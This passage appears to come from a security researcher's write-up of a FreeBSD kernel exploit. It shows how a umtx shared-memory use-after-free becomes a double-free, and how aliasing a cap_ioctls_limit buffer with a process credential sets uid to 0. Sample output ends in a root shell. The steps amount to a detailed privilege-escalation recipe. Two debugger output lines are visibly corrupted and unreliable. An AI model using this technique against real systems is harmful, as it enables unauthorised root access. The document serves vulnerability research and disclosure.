descriptor. If we close that file descriptor, the shmfd
will now have a
refcount of 1.
We can now call close
on our vulnerable file descriptor. That will call
shm_close
, which will call shm_drop
on the dangling shmfd
. Since the
dangling shmfd
now aliases the new shmfd
we just created, this will free
the new shmfd
while keeping the umtx_shm_reg
in the registry.
Now the umtx_shm_reg
entry holds a dangling shmfd
pointer.
Next we perform a UMTX_SHM_LOOKUP
operation. Here's the relevant part of
umtx_shm
again:
static int
umtx_shm(struct thread *td, void *addr, u_int flags)
{
struct umtx_key key;
struct umtx_shm_reg *reg;
struct file *fp;
int error, fd;
...
[2] reg = umtx_shm_find_reg(&key);
...
error = falloc_caps(td, &fp, &fd, O_CLOEXEC, NULL);
if (error == 0) {
[3] shm_hold(reg->ushm_obj);
finit(fp, FFLAGS(O_RDWR), DTYPE_SHM, reg->ushm_obj,
&shm_ops);
td->td_retval[0] = fd;
fdrop(fp, td);
}
}
umtx_shm_unref_reg(reg, false);
return (error);
}
At [2], the kernel will find the umtx_shm_reg
with the dangling shmfd
and
prepare a file descriptor for us. In setting up this file descriptor, it will
call shm_hold
on the freed data [3], bumping the refcount back from 0 to 1
again.
Finally, if we close
the resulting file descriptor right away, we will reach
shm_drop
again, but this time with all of the legitimate kernel pointers
still in place (since the freed memory wasn't zeroed).
We have now performed a double-free.
With this done, now is a good time to remove the umtx_shm_reg
entry since it
still holds a dangling pointer to this double-freed memory. It's safe to
perform a UMTX_SHM_DESTROY
at this point since the shmfd
refcount has
returned to zero: in cleaning up the umtx_shm_reg
, the refcount will drop
again, but to -1 this time — which is safe.
Now we are in a stable situation with a double-freed malloc256
element since
the size of a shmfd
is 208 bytes.
What this means is that the next 2 allocations from the malloc256
bucket
will return the same virtual address. By choosing which two allocations come
from there next, we can choose two objects to overlap in a useful way.
Aliasing a cap_ioctls_limit
Array with ucred
The cap_ioctls_limit
syscall will be very useful here. The purpose of
the syscall is to allow userland to specify an allowlist of permissible
ioctl
codes for an open file descriptor:
int
sys_cap_ioctls_limit(struct thread *td, struct cap_ioctls_limit_args *uap)
{
u_long *cmds;
size_t ncmds;
int error;
ncmds = uap->ncmds;
if (ncmds > IOCTLS_MAX_COUNT)
return (EINVAL);
if (ncmds == 0) {
cmds = NULL;
} else {
[1] cmds = malloc(sizeof(cmds[0]) * ncmds, M_FILECAPS, M_WAITOK);
[2] error = copyin(uap->cmds, cmds, sizeof(cmds[0]) * ncmds);
if (error != 0) {
free(cmds, M_FILECAPS);
return (error);
}
}
[3] return (kern_cap_ioctls_limit(td, uap->fd, cmds, ncmds));
}
We can see the way this works is to malloc
a user-controlled size [1], fill
it with user-controlled content [2] and attach it to a file descriptor [3].
By calling cap_ioctls_limit
with a zero length buffer, we cause the kernel
to free
any previously-attached ioctl
limit buffer.
With an ioctl
limit buffer in place, we can even read the contents of it
back with the cap_ioctls_get
syscall.
This provides us with:
- The ability to allocate from a range of
malloc
buckets. - The ability to fill that allocation with arbitrary data.
- The ability to read the contents of the buffer back.
- The ability to free that buffer whenever we want to.
This is an extremely powerful mechanism for controlling use-after-frees.
Armed with this knowledge, we will use an ioctl
limit buffer as one of our
allocations out of the double-freed address. Whichever other object we choose
as the other allocation for the double-freed address, we will now be able to
read the content through cap_ioctls_get
and even free/replace it with calls
to cap_ioctls_limit
.
Looking at the size of a ucred
credential structure, this seems like a
perfect candidate to alias since they will be allocated from the same bucket
as shmfd
came from (and hence where our double-free is set up):
(lldb) p sizeof(struct shmfd)
(unsigned long) /bin/sh = 208
(lldb) p sizeof(struct ucred)
(unsigned long) = 256
With our double freed element in place, the plan is then:
- Allocate once with
cap_ioctls_limit
. - Allocate again with a
ucred
by callingsetuid(getuid())
(this is allowed regardless of privilege and results in a newucred
allocation). - Read the
ucred
structure throughcap_ioctls_get
. - Fix up the
cr_uid
to be 0 and also increase thecr_ref
refcount. - Free the
ioctl
buffer withcap_ioctls_limit(NULL)
. - Allocate that buffer back again with
cap_ioctls_limit(&cred)
.
The net effect of this is that we've changed our process' credential:
cr_uid
is now 0, so we've become root.cr_ref
has increased — which will be explained now.
Stopping here isn't enough because we're in a dangerous position: closing the
file descriptor associated with the ioctl
limit buffer will free our
process' credential, ultimately leading to a panic. We need to transition to
a stable state.
Since we're now root according to the kernel, we're free to allocate ourselves
a better credential: we can call setresuid(0, 0, 0);
.
In doing this, the kernel will allocate a new ucred
and drop the refcount on
our previous one. Since we increased the cr_ref
as part of our fix-up, this
will prevent that ucred
from being freed. Our process will now transition
to the new full-root credential and away from the double-freed memory slot.
Finally, because the cr_ref
didn't reach zero, our file descriptor's ioctl
limit buffer holds the only reference to the double-freed slot — it's no
longer double-freed and so we've restored stability.
We can now call setresgid(0, 0, 0);
to fully transition to a pure root
credential, feel free to close the ioctl
limit file descriptor and simply
drop to a root shell.
Reference Implementation
My reference implementation of the exploit discussed here works in the way described at the end of the previous section:
- We leverage the vulnerability to acquire a file descriptor with a
dangling
shmfd
pointer. - We create/destroy another SHM through
UMTX_OP_SHM
to create a double-free. - We leverage the double-free to alias a
cap_ioctls_limit
buffer with aucred
struct. - We use
cap_ioctls_get
andcap_ioctls_limit
again to read/write theucred
in place. - We transition to a full root credential and close any resources.
- Finally, we drop to
/bin/sh -i
as root.
Sample output running against a 13.2-RELEASE kernel that I happen to have:
user@freebsd:~/umtx $ uname -a
FreeBSD freebsd 13.2-RELEASE FreeBSD 13.2-RELEASE releng/13.2-n254617-525ecfdad597 GENERIC amd64
user@freebsd:~/umtx $ make && ./umtx
cc -Isrc -c src/kalloc.c -o src/kalloc.o
cc -Isrc -c src/main.c -o src/main.o
cc -Isrc -c src/uaf.c -o src/uaf.o
cc -Isrc -c src/util.c -o src/util.o
cc -Isrc -pthread -o umtx src/kalloc.o src/main.o src/uaf.o src/util.o
[+] racing to create dangling shmfd...
[+] success!
[+] creating umtx_shm_reg with dangling shmfd
[+] doing double-free
[+] allocating placeholder into double slot
[+] allocating cred into double slot
[+] read cred with uid=1001:
0c 4e 1d 81 ff ff ff ff 00 00 03 01 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
02 00 00 00 02 00 00 00 ff ff ff ff 00 00 00 00
00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 e9 03 00 00 e9 03 00 00
e9 03 00 00 02 00 00 00 e9 03 00 00 e9 03 00 00
00 38 31 4c 00 f8 ff ff 00 38 31 4c 00 f8 ff ff
50 70 90 81 ff ff ff ff c0 28 07 03 00 f8 ff ff
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
bc 10 17 68 00 f8 ff ff 10 00 00 00 e9 03 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[+] fixing up and replacing
[+] attempting to secure creds
[+] uid=0, gid=0
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# whoami
root
#
Stability
Empirical testing shows that the probability of failing and triggering a kernel panic largely depends on how busy the kernel heap is while triggering the race condition. This is to be expected, since assumptions are made about which objects will be dispensed from the heap at critical points.
The reference implementation of the exploit was adjusted to improve stability in this way: a first cut constantly created and reaped new threads (for Thread A, Thread B and Thread C) in a loop, but this resulted in fairly common panics.
Adjusting the exploit to use primitive synchronisation between the threads — thereby avoiding auxiliary use of the heap — has proven to stabilise exploitation.
I have not yet observed any panics as a result of this refactoring.
PoC Archive
Contact me for an early copy of the reference implementation; otherwise, I will publish it here publicly in the near future.